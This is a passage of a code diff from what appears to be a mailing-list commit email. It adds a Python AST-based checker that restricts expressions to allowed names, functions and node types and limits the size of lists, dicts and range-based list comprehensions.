+ """Check if a subscript operation is safe."""
+ if isinstance(node.value, ast.Name):
+ return node.value.id not in self.blacklist
+ elif isinstance(node.value, ast.Attribute):
+ return self._check_attribute(node.value)
+ return True
+
+ def _check_module(self, node):
+ """Check if a module is safe by examining its contents."""
+ for stmt in node.body:
+ if isinstance(stmt, (ast.Import, ast.ImportFrom)):
+ if isinstance(stmt, ast.Import):
+ if not self._check_import(stmt):
+ return False
+ else:
+ if not self._check_importfrom(stmt):
+ return False
+ elif isinstance(stmt, ast.Expr):
+ if not self.is_safe_node(stmt.value):
+ return False
+ return True
+
+ def _get_attribute_name(self, node):
+ """Get the full name of an attribute."""
+ if isinstance(node.value, ast.Name):
+ return "{}.{}".format(node.value.id,node.attr)
+ elif isinstance(node.value, ast.Attribute):
+ return
"{}.{}".format(self._get_attribute_name(node.value),node.attr)
+ return node.attr
+
+ def is_safe_node(self, node):
+ """Check if a node and all its children are safe."""
+ for check_func in self.custom_checks().values():
+ if not check_func(node):
+ return False
+ for child in ast.iter_child_nodes(node):
+ if not self.is_safe_node(child):
+ return False
+ return True
+
+class CustomRule(RuleTemplate):
+ """
+ A custom rule implementation that allows specific constructs and provides
+ custom checks for list comprehensions and container sizes.
+ """
+
+ def allowed_names(self):
+ """Return a set of allowed variable names."""
+ return {'custom_var', 'another_var', 'x'} # 'x' added for list
comprehension
+
+ def allowed_functions(self):
+ """Return a set of allowed function names."""
+ return {'safe_function', 'range'} # 'range' added for list
comprehension
+
+ def allowed_node_types(self):
+ """Return a set of allowed AST node types."""
+ return {
+ ast.List, ast.Dict, ast.ListComp, ast.comprehension,
+ ast.Compare, ast.BinOp, ast.BoolOp, ast.And, ast.Or,
+ ast.Eq, ast.Gt, ast.Lt, ast.Mod,
+ ast.Name, ast.Load, ast.Store, ast.Call, ast.Constant
+ }
+
+ def custom_checks(self):
+ return {
+ ast.List: lambda node: len(node.elts) <= 10,
+ ast.Dict: lambda node: len(node.keys) <= 5,
+ ast.ListComp: self._check_list_comp
+ }
+
+ def _check_list_comp(self, node):
+ # Check if the list comprehension would produce at most 10 elements
+ if isinstance(node.generators[0].iter, ast.Call) and \
+ isinstance(node.generators[0].iter.func, ast.Name) and \
+ node.generators[0].iter.func.id == 'range':
+ range_arg = node.generators[0].iter.args[0]
+ if isinstance(range_arg, ast.Constant):
+ return range_arg.value <= 10
+ return False # If we can't determine the size, consider it unsafe
+
+
+
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]